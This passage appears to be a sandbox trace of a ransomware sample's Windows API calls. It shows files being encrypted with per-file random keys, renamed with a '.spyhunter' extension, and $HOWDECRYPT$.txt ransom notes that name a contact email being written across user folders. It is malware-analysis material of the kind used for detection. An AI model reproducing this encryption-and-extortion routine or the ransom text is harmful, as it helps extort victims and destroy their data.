lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f254*=0x2800, lpOverlapped=0x0) returned 1 [0144.606] GetProcessHeap () returned 0x2c0000 [0144.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0144.606] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.606] WriteFile (in: hFile=0x9c, lpBuffer=0x248f294*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f254, lpOverlapped=0x0 | out: lpBuffer=0x248f294*, lpNumberOfBytesWritten=0x248f254*=0x4, lpOverlapped=0x0) returned 1 [0144.608] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f254, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f254*=0x30, lpOverlapped=0x0) returned 1 [0144.611] CloseHandle (hObject=0x9c) returned 1 [0144.920] GetProcessHeap () returned 0x2c0000 [0144.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.920] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.spyhunter") returned 105 [0144.920] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore.spyhunter")) returned 1 [0144.921] GetProcessHeap () returned 0x2c0000 [0144.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.921] GetProcessHeap () returned 0x2c0000 [0144.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.921] GetProcessHeap () returned 0x2c0000 [0144.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f630e8 | out: hHeap=0x2c0000) returned 1 [0144.921] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f290 | out: pbBuffer=0x248f290) returned 1 [0144.921] GetProcessHeap () returned 0x2c0000 [0144.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.922] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f288*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f288*=0x30) returned 1 [0144.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.922] GetProcessHeap () returned 0x2c0000 [0144.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.922] GetProcessHeap () returned 0x2c0000 [0144.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe2a8 | out: hHeap=0x2c0000) returned 1 [0144.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f290 | out: pbBuffer=0x248f290) returned 1 [0144.922] GetProcessHeap () returned 0x2c0000 [0144.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.922] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f288*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f288*=0x30) returned 1 [0144.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.922] GetProcessHeap () returned 0x2c0000 [0144.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.922] GetProcessHeap () returned 0x2c0000 [0144.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe1e8 | out: hHeap=0x2c0000) returned 1 [0144.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.923] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0144.923] WriteFile (in: hFile=0xa0, lpBuffer=0x248f1bf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f2e8, lpOverlapped=0x0 | out: lpBuffer=0x248f1bf*, lpNumberOfBytesWritten=0x248f2e8*=0x127, lpOverlapped=0x0) returned 1 [0144.924] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0144.924] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f2e8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f2e8*=0x2ac, lpOverlapped=0x0) returned 1 [0144.925] CloseHandle (hObject=0xa0) returned 1 [0144.925] GetProcessHeap () returned 0x2c0000 [0144.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef73c8 | out: hHeap=0x2c0000) returned 1 [0144.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.925] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0144.925] WriteFile (in: hFile=0xa0, lpBuffer=0x248f1bb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f2e4, lpOverlapped=0x0 | out: lpBuffer=0x248f1bb*, lpNumberOfBytesWritten=0x248f2e4*=0x127, lpOverlapped=0x0) returned 1 [0144.926] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0144.926] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f2e4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f2e4*=0x2ac, lpOverlapped=0x0) returned 1 [0144.927] CloseHandle (hObject=0xa0) returned 1 [0144.927] GetProcessHeap () returned 0x2c0000 [0144.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffaa98 | out: hHeap=0x2c0000) returned 1 [0144.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.927] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0144.927] WriteFile (in: hFile=0xa0, lpBuffer=0x248f1b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f2e0, lpOverlapped=0x0 | out: lpBuffer=0x248f1b7*, lpNumberOfBytesWritten=0x248f2e0*=0x127, lpOverlapped=0x0) returned 1 [0144.928] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0144.928] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f2e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f2e0*=0x2ac, lpOverlapped=0x0) returned 1 [0144.929] CloseHandle (hObject=0xa0) returned 1 [0144.929] GetProcessHeap () returned 0x2c0000 [0144.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9c28 | out: hHeap=0x2c0000) returned 1 [0144.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f280 | out: pbBuffer=0x248f280) returned 1 [0144.929] GetProcessHeap () returned 0x2c0000 [0144.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f278*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f278*=0x30) returned 1 [0144.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.930] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 128 [0144.930] StrStrW (lpFirst="Web Slice Gallery~.feed-ms", lpSrch=".txt") returned 0x0 [0144.930] GetProcessHeap () returned 0x2c0000 [0144.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.930] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f23c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f23c*=0x2800, lpOverlapped=0x0) returned 1 [0144.940] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.940] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f23c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f23c*=0x2800, lpOverlapped=0x0) returned 1 [0144.940] GetProcessHeap () returned 0x2c0000 [0144.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.940] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.941] WriteFile (in: hFile=0xa0, lpBuffer=0x248f27c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f23c, lpOverlapped=0x0 | out: lpBuffer=0x248f27c*, lpNumberOfBytesWritten=0x248f23c*=0x4, lpOverlapped=0x0) returned 1 [0144.941] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f23c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f23c*=0x30, lpOverlapped=0x0) returned 1 [0144.941] CloseHandle (hObject=0xa0) returned 1 [0144.941] GetProcessHeap () returned 0x2c0000 [0144.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.941] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.spyhunter") returned 138 [0144.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.spyhunter")) returned 1 [0144.943] GetProcessHeap () returned 0x2c0000 [0144.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.943] GetProcessHeap () returned 0x2c0000 [0144.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.943] GetProcessHeap () returned 0x2c0000 [0144.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4ea8 | out: hHeap=0x2c0000) returned 1 [0144.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f278 | out: pbBuffer=0x248f278) returned 1 [0144.943] GetProcessHeap () returned 0x2c0000 [0144.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f270*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f270*=0x30) returned 1 [0144.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.944] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0144.944] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".txt") returned 0x0 [0144.944] GetProcessHeap () returned 0x2c0000 [0144.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.944] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f234*=0x2800, lpOverlapped=0x0) returned 1 [0144.945] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.945] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f234*=0x2800, lpOverlapped=0x0) returned 1 [0144.946] GetProcessHeap () returned 0x2c0000 [0144.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.946] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.946] WriteFile (in: hFile=0xa0, lpBuffer=0x248f274*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x248f274*, lpNumberOfBytesWritten=0x248f234*=0x4, lpOverlapped=0x0) returned 1 [0144.946] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f234*=0x30, lpOverlapped=0x0) returned 1 [0144.946] CloseHandle (hObject=0xa0) returned 1 [0144.946] GetProcessHeap () returned 0x2c0000 [0144.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.946] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.spyhunter") returned 97 [0144.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.spyhunter")) returned 1 [0144.947] GetProcessHeap () returned 0x2c0000 [0144.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.947] GetProcessHeap () returned 0x2c0000 [0144.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.947] GetProcessHeap () returned 0x2c0000 [0144.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000700 | out: hHeap=0x2c0000) returned 1 [0144.947] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f278 | out: pbBuffer=0x248f278) returned 1 [0144.947] GetProcessHeap () returned 0x2c0000 [0144.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.947] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f270*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f270*=0x30) returned 1 [0144.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.948] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0144.948] StrStrW (lpFirst="Microsoft at Work~.feed-ms", lpSrch=".txt") returned 0x0 [0144.949] GetProcessHeap () returned 0x2c0000 [0144.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.949] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f234*=0x2800, lpOverlapped=0x0) returned 1 [0144.950] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.950] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f234*=0x2800, lpOverlapped=0x0) returned 1 [0144.950] GetProcessHeap () returned 0x2c0000 [0144.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.950] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.950] WriteFile (in: hFile=0xa0, lpBuffer=0x248f274*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x248f274*, lpNumberOfBytesWritten=0x248f234*=0x4, lpOverlapped=0x0) returned 1 [0144.951] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f234, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f234*=0x30, lpOverlapped=0x0) returned 1 [0144.951] CloseHandle (hObject=0xa0) returned 1 [0144.951] GetProcessHeap () returned 0x2c0000 [0144.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.951] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.spyhunter") returned 104 [0144.951] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.spyhunter")) returned 1 [0144.952] GetProcessHeap () returned 0x2c0000 [0144.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.952] GetProcessHeap () returned 0x2c0000 [0144.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.952] GetProcessHeap () returned 0x2c0000 [0144.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62dd0 | out: hHeap=0x2c0000) returned 1 [0144.952] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f270 | out: pbBuffer=0x248f270) returned 1 [0144.952] 